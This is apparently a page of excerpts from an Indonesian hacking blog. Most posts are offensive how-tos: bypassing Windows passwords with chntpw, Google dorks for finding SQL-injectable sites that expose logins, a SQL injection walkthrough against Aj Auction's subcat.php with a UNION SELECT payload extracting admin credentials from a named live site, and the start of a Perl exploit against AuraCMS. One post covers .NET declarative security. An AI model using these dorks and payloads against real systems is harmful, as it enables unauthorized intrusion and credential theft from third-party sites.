• 11

    Nov

    Open Windows Password with Ubuntu

    This time I will discuss topics on how to open a windows password using ubuntu, edited from articles detikInet. The first thing to do is create a Live CD or Live USB stick Ubuntu Linux. Ubuntu Live will be used to boot into the system and perform the procedures required to dismantle the Windows password earlier. The easiest way to do that is by downloading and running UNetbootin. This simple application will download the selected Ubuntu version and install on the flash that you prepared The second stage is to install Open Source utility called chntpw. This is done from Ubuntu by running Synaptic Package Manager. To get chntpw, Synaptic Package Manager should be directed to look at storage applications Universe. This can be done by clicking the Settings menu> Repositories in Synaptic
  • 30

    Oct

    SQL Injection with Google

    Saya akan membahas tentang teknik SQL injection dengan google. Karena google adalah mesin pencari dunia, jadi bisalah klo disuruh cari bug. Coba kita masukkan berikut ini dan temukan hasilnya. Quote:inurl:(username,0×3a,password) Quote:inurl:group_concat(User_Name,0×3a,User_Password) Quote:inurl:concat(pwd,0×3a,name) Quote:inurl:concat_ws(0×3a,ID,username,password%20) Quote:inurl:group_conca (login,0×3a,passwd,0×3a,nama,0×3a,email,0×3a,status) Quote:inurl:group_concat(LoginName,0×3a,LoginPassword) allinurl:group_concat(table_name)+from+information_schema.tables Dah dapet target,lanjut scan menggunakan teknik masing-masing ya.. mungkin sedikit aja yang bisa di share, semoga bermanfaat. (tapi mungkin anda tidak dapat menggunakannya kembali
  • 15

    Oct

    Inject Web

    SQL Injection pada Aj Auction untuk seluruh versi. Lagi-lagi bug baru di temukan, kali ini saya akan coba masuk sebagai admin pada situs yang memiliki bug pada halaman subcat.php langsung aja buka google-nya masukkan keyword ini inurl:/subcat.php?cate_id= nah loh, dapet banyak bangett pilih aja salah satunya contoh : http://www.estoop.it/subcat.php?cate_id=146&view=list&PHPSESSID=27c9b2b6500f2c01c09eda1978d45096 setelah cate_id= di hapus aja kemudian di ganti dengan -1%20union%20select%200,concat(char(116,117,114,107,101,121,58),user_name,char(116,117,114,107,101,121,112,97,115,115,58),pas sword),2%20from%20admin/*&view=list kira kira jadi begini http://www.estoop.it/subcat.php?cate_id=-1%20union%20select%200,concat(char(116,117,114,107,101,121,58),user_name,char(116
  • 9

    Oct

    Declarative Security and Reflection

    If youre using the CustomAttributeData APIs to examine declarative security permission, you might notice that the returned information looks a little strange. The CustomAttributeData object that youll see for the declarative security attribute will have a ConstructorInfo that is of the correct type, but may not be the same constructor that was actually used in the source code. Similarly, the ConstructorArguments and NamedArguments property will say that the attribute has neither, even though if you look at your source code you may see one or both of these types of arguments. So, whats going on? This behavior is a side-effect of the fact that security permission attributes arent real custom attributes in the sense that theyre not stored in the CustomAttribute metadata table
  • 9

    Oct

    Compile Exploit dengan ActivePerl

    Kadang-kadang saat kita browse ke milw0rm kita menemukan mengeksploitasi yang menggunakan perl. Tapi kita bingung bagaimana menggunakan eksploit ini di mesin Windows. Untuk mengatasi kebingungan Anda, saya akan mencoba untuk berbagi informasi tentang bagaimana menggunakan eksploit ini. Untuk menggunakan eksploit ini kita membutuhkan software yang disebut ActivePerl, silahkan cari di google untuk mendapatkannya. Sepertinya ada di CD-yogyafree. Oke setelah Anda menginstal ActivePerl dan kemudian langkah berikutnya adalah untuk mencari exploit yang kita gunakan. Sebagai contoh, kita menggunakan mengeksploitasi:#!/usr/bin/perl use LWP::UserAgent; use HTTP::Cookies; use Getopt::Long; # # [!] Discovered.: DNX # [!] Vendor..: http://www.auracms.org # [!] Detected: 19.01.2008 # [!] Repo
-

Author

Follow Me

Search

Recent Post